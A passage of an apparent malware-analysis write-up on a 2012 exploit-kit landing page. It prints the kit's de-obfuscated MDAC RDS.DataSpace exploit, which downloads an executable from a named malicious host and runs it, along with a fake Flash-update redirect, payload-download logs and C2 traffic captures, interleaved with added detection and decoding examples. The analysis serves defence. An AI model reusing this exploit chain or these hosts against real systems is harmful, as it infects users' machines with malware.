  785. q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
  786. }
  787. }
  788. q += a + f + "/" + g + ">"
  789. }
  790. else {
  791. q = a
  792. }
  793. if (!k.div){
  794. j = n.getElementById(k.divID);
  795. if (j){
  796. k.div = j
  797. }
  798. else {
  799. k.div = n.createElement("div");
  800. k.div.id = k.divID
  801. }
  802. k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
  803. 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
  804. + "px", "verticalAlign", "baseline", "display", "block"]));
  805. if (!j){
  806. k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
  807. k.insertDivInBody(k.div)
  808. }
  809. }
  810. if (k.div && k.div.parentNode){
  811. k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
  812. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  813. try {
  814. p.innerHTML = q
  815. }
  816. catch (m){
  817. }
  818. ;
  819. try {
  820. k.div.appendChild(p)
  821. }
  822. catch (m){
  823. }
  824. ;
  825. return {
  826. span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
  827. }
  828. }
  829. return {
  830. span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
  831. }
  832. }
  833. , Plugins : {
  834. adobereader : {
  835. mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
  836. "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
  837. {
  838. }
  839. , pluginHasMimeType : function (d, c, f){
  840. var b = this , e = b.$, a;
  841. for (a in d){
  842. if (d[a] && d[a].type && d[a].type == c){
  843. return 1
  844. }
  845. }
  846. if (e.getMimeEnabledPlugin(c, f)){
  847. return 1
  848. }
  849. return 0
  850. }
  851. , getVersion : function (l, j){
  852. var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
  853. if (d.isString(j)){
  854. j = j.replace(/\s/g, "");
  855. if (j){
  856. k = j
  857. }
  858. }
  859. else {
  860. j = null
  861. }
  862. if (d.isDefined(g.INSTALLED[k])){
  863. g.installed = g.INSTALLED[k];
  864. return
  865. }
  866. if (!d.isIE){
  867. a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
  868. if (g.getVersionDone !== 0){
  869. g.getVersionDone = 0;
  870. b = d.getMimeEnabledPlugin(g.mimeType, a);
  871. if (!j){
  872. n = b
  873. }
  874. if (!b && d.hasMimeType(g.mimeType)){
  875. b = d.findNavPlugin(a, 0)
  876. }
  877. if (b){
  878. g.navPluginObj = b;
  879. h = d.getNum(b.description) || d.getNum(b.name);
  880. h = d.getPluginFileVersion(b, h);
  881. if (!h && d.OS == 1){
  882. if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
  883. h = "9"
  884. }
  885. else {
  886. if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
  887. h = "8"
  888. }
  889. }
  890. }
  891. }
  892. }
  893. else {
  894. h = g.version
  895. }
  896. if (!d.isDefined(n)){
  897. n = d.getMimeEnabledPlugin(k, a)
  898. }
  899. g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
  900. }
  901. else {
  902. b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
  903. c = /=\s*([\d\.]+)/g;
  904. try {
  905. f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
  906. ""], "", g))).GetVersions();
  907. for (m = 0; m < 5; m ++ ){
  908. if (c.test(f) && (!h || RegExp.$1 > h)){
  909. h = RegExp.$1
  910. }
  911. }
  912. }
  913. catch (i){
  914. }
  915. g.installed = h ? 1 : (b ? 0 :- 1)
  916. }
  917. if (!g.version){
  918. g.version = d.formatNum(h)
  919. }
  920. g.INSTALLED[k] = g.installed
  921. }
  922. }
  923. , zz : 0
  924. }
  925. }
  926. ;
  927. PluginDetect.initScript();
  928. PluginDetect.getVersion(".");
  929. pdfver = PluginDetect.getVersion("AdobeReader");
  930. }
  931. catch (e){
  932. }
  933. if (typeof pdfver == 'string'){
  934. pdfver = pdfver.split('.')
  935. }
  936. else {
  937. pdfver = [0, 0, 0, 0]
  938. }
  939. function x(s){
  940. d = [];
  941. for (i = 0; i < s.length; i ++ ){
  942. k = (s.charCodeAt(i) - 46).toString(16);
  943. if (k.length == 1)k = "0" + k;
  944. d.push(k);
  945. }
  946. ;
  947. return d.join("");
  948. }
  949. end_redirect = function (){
  950. window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
  951. }
  952. ;
  953. window.onbeforeunload = function (){
  954. return "";
  955. }
  956. ;
  957. try {
  958. var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
  959. ra3.setAttribute("id", ra3);
  960. ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  961. try {
  962. var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
  963. "Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
  964. try {
  965. ra2.open("GET", "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
  967. ra2.send();
  968. ra0.type = 1;
  969. ra0.open();
  970. ra0.Write(ra2.responseBody);
  971. ra0.SaveToFile(ra4, 2);
  972. ra0.Close();
  973. }
  974. catch (e){
  975. }
  976. try {
  977. with (ra1){
  978. shellexecute(ra4);
  979. }
  980. }
  981. catch (e){
  982. }
  983. }
  984. catch (e){
  985. }
  986. }
  987. catch (errno){
  988. }
  989. document.write('');
  990. setTimeout(end_redirect, 60000);
  991.  
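Added example (JavaScript), not code from the captured landing page: the stage-one decode loop shown at the end of the first dump (if(zxc){... for(i=0;i<93;i++) s+=asd2(); ... s=s.replace(/[^a-z0-9]+/g,""); ... document.body=s}) re-implemented so that it returns the decoded text instead of splicing it into document.body. The per-pair decoder asd3() is not visible on the page, so it is passed in as a parameter; to exercise it, the kit's own x() helper from the second stage (charCode minus 46, emitted as two hex digits) is used as the encoding and its inverse unxPair() as the pair decoder. The 93-chunk count matches the 0..92 numbered attributes of the <span> that precedes the script. The sample URL, chunking and noise characters are constructed here; the real blob above uses a different, unknown pair alphabet.

```javascript
// Added example, not from the captured page. Re-implements the stage-one
// decode loop without executing or injecting anything: chunks are joined,
// non [a-z0-9] noise is stripped, and each two-character pair is decoded by
// the supplied pairDecoder (the page's asd3(), which is not shown).
function decodeBlob(chunks, pairDecoder) {
  const s = chunks.join("").replace(/[^a-z0-9]+/g, "");
  let out = "";
  for (let i = 0; i < s.length; i += 2) out += pairDecoder(s.slice(i, i + 2));
  return out;
}

// The kit's x() helper as it appears on the page (it encodes the URLs handed
// to the PDF/JAR legs), rewritten without the implicit globals d, i, k.
function x(s) {
  const d = [];
  for (let i = 0; i < s.length; i++) {
    let k = (s.charCodeAt(i) - 46).toString(16);
    if (k.length == 1) k = "0" + k;
    d.push(k);
  }
  return d.join("");
}

// Inverse of one x() pair. Characters below code 46 (e.g. "-") make x() emit
// a signed pair such as "-1"; the strip step in decodeBlob() would eat the
// sign, so a blob encoded this way can only carry characters in 46..301.
function unxPair(pair) {
  return String.fromCharCode(parseInt(pair, 16) + 46);
}
function unx(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) out += unxPair(hex.slice(i, i + 2));
  return out;
}

// Constructed sample: a placeholder URL encoded with x(), cut into 8-char
// chunks and salted with punctuation between every symbol, the way the
// captured <span> attributes are.
const SAMPLE_URL = "http://example.invalid/links/return_west.php?a=1";
const NOISE = "&+%)#*!^_$(@";
const NOISY_CHUNKS = x(SAMPLE_URL).match(/.{1,8}/g)
  .map((chunk, i) => chunk.split("").join(NOISE[i % NOISE.length]));
```

decodeBlob(NOISY_CHUNKS, unxPair) gives SAMPLE_URL back; the same harness can be pointed at the real span data once asd3() has been recovered from the page, which is safer than letting the original loop assign the result to document.body.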
  992.  
  993. =====================================================
  994. EXPLOITATION & INFECTIONS OCCURRED (PE BASED ONLY)
  995. ======================================================
  996.  
  997. 1. MDAC arbitrary file download and execution via the Microsoft Data Access Components (MDAC) RDS.DataSpace ActiveX control, CVE-2006-0003 (MS06-014)
  998.  
  999. ActiveX control clsid BD96C556-65A3-11D0-983A-00C04FC29E36 (RDS.DataSpace) is instantiated and its CreateObject() is abused to create ADODB.Stream, Shell.Application and MSXML2.XMLHTTP (written "msxml2.XMLh00p" in the captured code above only because this paste defangs every "http"); the "adod".concat("b.str","eam") split keeps the ADODB.Stream ProgID out of the page text
 1000. MSXML2.XMLHTTP downloads the malware below, ADODB.Stream writes the response body with SaveToFile() to .//..//03ab326.exe
 1001. Shell.Application then runs it with shellexecute(); independently of whether that chain worked, setTimeout(end_redirect, 60000) sends the browser to update_flash_player.exe after 60 seconds
  1002.  
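Added example (JavaScript), not part of the original write-up: a static scanner for the RDS.DataSpace download-and-execute chain summarised above, meant to run over captured HTML/JS text rather than in the victim browser. It first folds the two string-splitting tricks ("x".concat("y","z") and "x" + "y") so that the hidden ProgIDs become plain literals, then checks each link of the chain. The SAMPLE input is constructed from the de-obfuscated code above with a placeholder URL; BENIGN is a constructed control that uses MSXML2.XMLHTTP legitimately. The indicator names and the rule that only the full fetch + write + execute chain counts are choices made here.

```javascript
// Added example, not from the captured page: static scanner for the
// CVE-2006-0003 / MS06-014 RDS.DataSpace chain. Nothing in the input is executed.
const RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36";

// Undo "adod".concat("b.str","eam") and "Shell." + "Application" style splits
// until the text stops changing, so the ProgIDs can be matched as literals.
function foldStrings(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(/"([^"]*)"\s*\.concat\(\s*((?:"[^"]*"\s*,?\s*)+)\)/g,
      (_, head, args) => '"' + head + args.match(/"[^"]*"/g).map(a => a.slice(1, -1)).join("") + '"');
    src = src.replace(/"([^"]*)"\s*\+\s*"([^"]*)"/g, (_, a, b) => '"' + a + b + '"');
  } while (src !== prev);
  return src;
}

// One regex per link of the chain. "h00p" is accepted alongside "http"
// because the paste above defangs every occurrence of "http".
const INDICATORS = [
  ["rds-dataspace-clsid", new RegExp(RDS_DATASPACE_CLSID, "i")],
  ["createobject-via-rds", /\.CreateObject\s*\(/i],
  ["adodb-stream", /adodb\.stream/i],
  ["shell-application", /shell\.application/i],
  ["msxml2-xmlhttp", /msxml2\.xmlh(?:ttp|00p)/i],
  ["savetofile", /\.SaveToFile\s*\(/i],
  ["shellexecute", /shellexecute\s*\(/i],
];

function scanForMdac(src) {
  const folded = foldStrings(src);
  const hits = INDICATORS.filter(([, re]) => re.test(folded)).map(([name]) => name);
  // The control alone is legitimate; flag only fetch + write-to-disk + execute.
  const chain = ["rds-dataspace-clsid", "adodb-stream", "savetofile", "shellexecute"]
    .every(n => hits.includes(n));
  return { hits, chain };
}

// Constructed from the de-obfuscated exploit code above; URL is a placeholder.
const SAMPLE = `
var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var ra0 = ra3.CreateObject("adod".concat("b.str","eam"), ""),
    ra1 = ra3.CreateObject("Shell." + "Application", ""),
    ra2 = ra3.CreateObject("msxml2.XMLHTTP", "");
ra2.open("GET", "http://example.invalid/links/return-west.php", false);
ra2.send(); ra0.type = 1; ra0.open(); ra0.Write(ra2.responseBody);
ra0.SaveToFile(ra4, 2); ra0.Close();
with (ra1) { shellexecute(ra4); }
`;
// Constructed benign control: a plain XMLHTTP request, no RDS, no file write.
const BENIGN = `var xhr = new ActiveXObject("Msxml2.XMLHTTP"); xhr.open("GET", "/api", true);`;
```

scanForMdac(SAMPLE) reports all seven indicators and chain: true; scanForMdac(BENIGN) reports only the XMLHTTP ProgID and chain: false. The folding step is what makes the difference: without it, "adodb.stream" never appears in the sample text.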
  1003. --user-agent="Mozila/4.3(X11; U; MacOSX)"
  1004. --cookies=on --keep-session-cookies --save-cookies mycookies.txt
  1005. --referer="h00p://74.200.211.205/SQeyUUzT/js.js"
  1006. "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
  1007. --output-document="03ab326.exe"
  1008. --16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
  1009. => `sample1'
  1010. Resolving ser.luckypetspetsitting.com... 198.143.159.66
  1011. Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
  1012. h00p request sent, awaiting response... 200 OK
  1013. Length: 256,784 (251K) [application/x-msdownload]
  1014. 16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
  1015.  
  1016. 2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
  1017.  
  1018. --18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
  1019. => `update_flash_player.exe'
  1020. Resolving 4.icedambusters.com... 198.74.52.86
  1021. Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
  1022. h00p request sent, awaiting response... 200 OK
  1023. Length: 256,784 (251K) [application/octet-stream]
  1024. 18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS PREVIOUS DROPPED!
  1025.  
  1026.  
  1027. ==============================================================================
  1028. NETWORK FULL ANALYSIS of Trojan, Backdoor, Encrypt, Downloader 03ab326.exe (saved [256784/256784])
  1029. ================================================================================
  1030.  
  1031. 1) DNS : Standard query A rabbitharky.com
  1032.  
  1033. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1034. 0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
  1035. 0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
  1036. 0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
  1037. 0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
  1038.  
  1039. Standard query response A 198.143.159.66
  1040.  
  1041. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1042. 0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
  1043. 0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
  1044. 0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
  1045. 0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
  1046. 0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
  1047.  
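To make the two DNS frames above machine-readable, here is an added Python example (my own code, not from the MalwareMustDie paste) that rebuilds the raw bytes from the hex dump text copied above, strips the Ethernet/IPv4/UDP headers, and decodes the question and the A answer, including the 0xC0 compression pointer the response uses for the answer name.

```python
# Added example, not from the original paste; the dump text below is copied from the capture above.
import itertools, re, struct
QUERY = """0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ..."""
RESPONSE = """0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B"""

def hexdump_to_bytes(dump):
    """Rebuild the raw frame: skip the offset column, take hex pairs until the ASCII column starts."""
    out = bytearray()
    for line in dump.splitlines():
        pairs = itertools.takewhile(lambda t: re.fullmatch(r"[0-9a-f]{2}", t), line.split()[1:17])
        out.extend(int(t, 16) for t in pairs)
    return bytes(out)

def read_name(msg, pos):
    """Read a DNS name, following 0xC0xx compression pointers; return (name, position after it)."""
    labels, end = [], None
    while (n := msg[pos]) != 0:
        if n & 0xC0 == 0xC0:               # pointer: remember where we left off, then jump back
            end, pos = end or pos + 2, ((n & 0x3F) << 8) | msg[pos + 1]
        else:
            labels.append(msg[pos + 1:pos + 1 + n].decode("ascii")); pos += 1 + n
    return ".".join(labels), end or pos + 1

def decode_frame(dump):
    """Strip Ethernet/IPv4/UDP, then decode the DNS header, question and any A-record answers."""
    f = hexdump_to_bytes(dump)
    dns = f[14 + (f[14] & 0x0F) * 4 + 8:]       # 14 Ethernet + IHL*4 IPv4 + 8 UDP bytes
    txid, flags, qd, an = struct.unpack("!4H", dns[:8])
    pos, questions, answers = 12, [], []
    for _ in range(qd):
        name, pos = read_name(dns, pos)
        questions.append((name, struct.unpack("!H", dns[pos:pos + 2])[0])); pos += 4
    for _ in range(an):
        name, pos = read_name(dns, pos)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", dns[pos:pos + 10]); pos += 10
        if rtype == 1 and rdlen == 4:           # A record: rdata is the dotted-quad address
            answers.append((name, ".".join(str(b) for b in dns[pos:pos + 4]), ttl))
        pos += rdlen
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions, "answers": answers}
```

Running decode_frame on RESPONSE yields the same transaction id 0xd020 as the query and the answer rabbitharky.com -> 198.143.159.66 with a TTL of 7199 seconds.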
  1048.  
  1049. 2) h00p/1.0 POST: 192.168.7.84 ⇒ 198.143.159.66
  1050.  
  1051. POST /forum/viewtopic.php h00p/1.0
  1052. Host: rabbitharky.com
  1053. Accept: */*
  1054. Accept-Encoding: identity, *;q=0
  1055. Content-Length: 257
  1056. Connection: close
  1057. Content-Type: application/octet-stream
  1058. Content-Encoding: binary
  1059. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1060.  
  1061. CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
  1062. ...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
  1063. .....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
  1064. pH...v*].....1..jw`a.....<"....4
  1065. M.R,.._X..h00p/1.1 200 OK
  1066.  
  1067. Server: nginx/0.7.67
  1068. Date: Sat, 27 Oct 2012 08:17:04 GMT
  1069. Content-Type: text/html
  1070. Connection: close
  1071. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  1072.  
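As an added example that is not part of the original paste, the following Python flags requests that share the traits of the C2 beacon captured in 2) above. The first sample reproduces the captured request headers with a constructed body that keeps only the CRYPTED0 marker and the captured Content-Length; the other two samples are constructed benign requests for contrast.

```python
# Added example, not from the original paste: flag requests carrying the traits of the C2 beacon in 2).
import re

# Sample 1 reproduces the captured headers; its body is a constructed stand-in that keeps only the
# "CRYPTED0" marker and the captured Content-Length. Samples 2 and 3 are constructed benign traffic.
SAMPLE_REQUESTS = [
    ("POST /forum/viewtopic.php HTTP/1.0\r\nHost: rabbitharky.com\r\nAccept: */*\r\n"
     "Accept-Encoding: identity, *;q=0\r\nContent-Length: 257\r\nConnection: close\r\n"
     "Content-Type: application/octet-stream\r\nContent-Encoding: binary\r\n"
     "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n"
     "CRYPTED0" + "\x00" * 249),
    ("POST /forum/viewtopic.php HTTP/1.1\r\nHost: example.org\r\nContent-Length: 22\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/16.0\r\n\r\ntitle=hello&body=world"),
    ("GET /index.html HTTP/1.1\r\nHost: example.org\r\n"
     "User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/16.0\r\n\r\n"),
]

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in header_lines if ":" in l)}
    return method, path, headers, body

def beacon_indicators(raw):
    """Return the captured-beacon traits present in one request; two or more should alert."""
    method, path, h, body = parse_request(raw)
    hits = []
    if method == "POST" and body.startswith("CRYPTED0"):
        hits.append("body opens with the CRYPTED0 marker")
    if h.get("content-type") == "application/octet-stream" and path.endswith(".php"):
        hits.append("binary blob POSTed to a .php script path")
    if h.get("content-encoding", "").lower() == "binary":
        hits.append("non-standard Content-Encoding: binary")
    if re.search(r"MSIE [45]\.\d.*Windows 98", h.get("user-agent", "")):
        hits.append("legacy MSIE 5.0 / Windows 98 User-Agent, as in the captured request")
    return hits

def scan(requests):
    """Run the check over a list of raw requests; returns the indexes that alert (2+ traits)."""
    return [i for i, raw in enumerate(requests) if len(beacon_indicators(raw)) >= 2]
```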
  1073.  
  1074. 3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
  1075.  
  1076. GET /CaBPXFg.exe h00p/1.0
  1077. Host: SpringBackColorado.com
  1078. Accept: */*
  1079. Accept-Encoding: identity, *;q=0
  1080. Connection: close
  1081. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1082.  
  1083. h00p/1.1 200 OK
  1084. Date: Sat, 27 Oct 2012 08:17:05 GMT
  1085. Server: Apache
  1086. Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
  1087. Accept-Ranges: bytes
  1088. Content-Length: 424208
  1089. Connection: close
  1090. Content-Type: application/x-msdownload
  1091.  
  1112. PoC:
  1113.  
  1114. --17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
  1115. => `CaBPXFg.exe'
  1116. Resolving springbackcolorado.com... 64.29.151.221
  1117. Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
  1118. h00p request sent, awaiting response... 200 OK
  1119. Length: 424,208 (414K) [application/x-msdownload]
  1120. 17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
  1121.  
  1122.  
  1123. 4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe
  1124.  
  1125. GET /cXbAC.exe h00p/1.0
  1126. Host: 180degrees.org.nz
  1127. Accept: */*
  1128. Accept-Encoding: identity, *;q=0
  1129. Connection: close
  1130. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1131.  
  1132. h00p/1.1 200 OK
  1133. Date: Sat, 27 Oct 2012 08:17:12 GMT
  1134. Server: Apache
  1135. Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
  1136. Accept-Ranges: bytes
  1137. Content-Length: 424208
  1138. Connection: close
  1139. Content-Type: application/x-msdownload
  1140.  
  1161. PoC:
  1162.  
  1163. --17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
  1164. => `cXbAC.exe'
  1165. Resolving 180degrees.org.nz... 66.117.15.147
  1166. Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
  1167. h00p request sent, awaiting response... 200 OK
  1168. Length: 424,208 (414K) [application/x-msdownload]
  1169. 17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
  1170.  
  1171.  
  1172.  
  1173. 5) h00p/1.0 GET: weareseasons.com/7yoZf5.exe
  1174.  
  1175. GET /7yoZf5.exe h00p/1.0
  1176. Host: weareseasons.com
  1177. Accept: */*
  1178. Accept-Encoding: identity, *;q=0
  1179. Connection: close
  1180. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1181.  
  1182. h00p/1.1 200 OK
  1183. Date: Sat, 27 Oct 2012 08:17:19 GMT
  1184. Server: Apache
  1185. Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
  1186. ETag: "b008a82d-67910-4cd05d3c57d54"
  1187. Accept-Ranges: bytes
  1188. Content-Length: 424208
  1189. Connection: close
  1190. Content-Type: application/x-msdos-program
  1191.  
  1213. PoC:
  1214.  
  1215. --17:54:45-- h00p://weareseasons.com/7yoZf5.exe
  1216. => `7yoZf5.exe'
  1217. Resolving weareseasons.com... 87.106.194.196
  1218. Connecting to weareseasons.com|87.106.194.196|:80... connected.
  1219. h00p request sent, awaiting response... 200 OK
  1220. Length: 424,208 (414K) [application/x-msdos-program]
  1221. 17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
  1222.  
  1223.  
  1224. 6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1225.  
  1226. SYN:
  1227.  
  1228. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1229. 0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
  1230. 0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
  1231. 0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
  1232.  
  1233. REPLIES:
  1234.  
  1235. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1236. 0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
  1237. 0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
  1238. 0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
  1239. 0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
  1240.  
  1241. :-)) LOLZ
  1242.  
  1243.  
  1244. 7) SYN & ACK to Malware Host 195.169.125.228
  1245.  
  1246. 195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  1247.  
  1248. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1249. 0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
  1250. 0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
  1251. 0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
  1252.  
  1253. 192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1254.  
  1255. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1256. 0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
  1257. 0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
  1258. 0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
  1259.  
  1260.  
  1261. 8) KEEP ALIVE DATA SENT TO 70.138.242.12
  1262.  
  1263. 192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1264.  
  1265. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1266. 0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
  1267. 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
  1268. 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
  1269.  
  1270. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1271. 0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
  1272. 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
  1273. 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
  1274.  
  1275.  
  1276. -------
  1277. #MalwareMustDie!!! Crusaders Rocks!!
  1278. Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!